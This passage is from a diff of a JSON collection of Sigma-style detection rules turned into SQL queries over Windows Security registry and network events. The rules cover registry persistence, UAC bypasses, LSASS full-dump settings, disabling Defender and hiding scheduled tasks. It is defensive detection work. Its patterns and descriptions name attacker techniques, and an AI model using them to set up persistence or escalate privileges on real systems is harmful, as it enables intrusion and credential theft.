ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" ], - "filename": "net_connection_win_dllhost_net_connections.yml" + "filename": "registry_set_comhijack_sdclt.yml" }, { - "title": "Script Initiated Connection", - "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "net_connection_win_script.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", - "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "status": "experimental", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Notepad Making Network Connection", - "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", - "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "title": "Enable Local Manifest Installation With Winget", + "id": "fa277e82-9b78-42dd-b05c-05555c7b6015", + "status": "experimental", + "description": "Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", "attack.defense_evasion", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Administrators or developers might enable this for testing purposes or to install custom private packages" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\AppInstaller\\\\EnableLocalManifestFiles' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_set_winget_enable_local_manifest.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "status": "test", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Potential Persistence Via Visual Studio Tools for Office", - "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "status": "experimental", - "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", - "author": "Bhabesh Raj", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.t1137.006", - "attack.persistence" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate Addin Installation" + "Legitimate application that needs to do a full dump of their process" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" ], - "filename": "registry_set_persistence_office_vsto.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Wow6432Node CurrentVersion Autorun Keys Modification", - "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "title": "Classes Autorun Keys Modification", + "id": "9df5f547-c86a-433e-b533-f2794357e242", "status": "experimental", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", @@ -33005,334 +32721,371 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (NewValue LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR NewValue = 'grpconv -o' OR NewValue LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND NewValue LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND NewValue LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND NewValue LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND NewValue LIKE '% /burn.runonce' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewValue = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" + "filename": "registry_set_asep_reg_keys_modification_classes.yml" }, { - "title": "Outlook Security Settings Updated - Registry", - "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "status": "experimental", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin Songer @austinsonger", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + ], + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + }, + { + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects changes to the registry values related to outlook security settings", - "author": "frack113", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ "attack.persistence", - "attack.t1137" + "attack.t1053.005" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_office_outlook_security_settings.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "title": "Add Debugger Entry To AeDebug For Persistence", + "id": "092af964-4233-4373-b4ba-d86ea2890288", "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_set_aedebug_persistence.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", "author": "frack113", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.001" + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "System Scripts Autorun Keys Modification", + "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1112" + "attack.t1547.001" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal 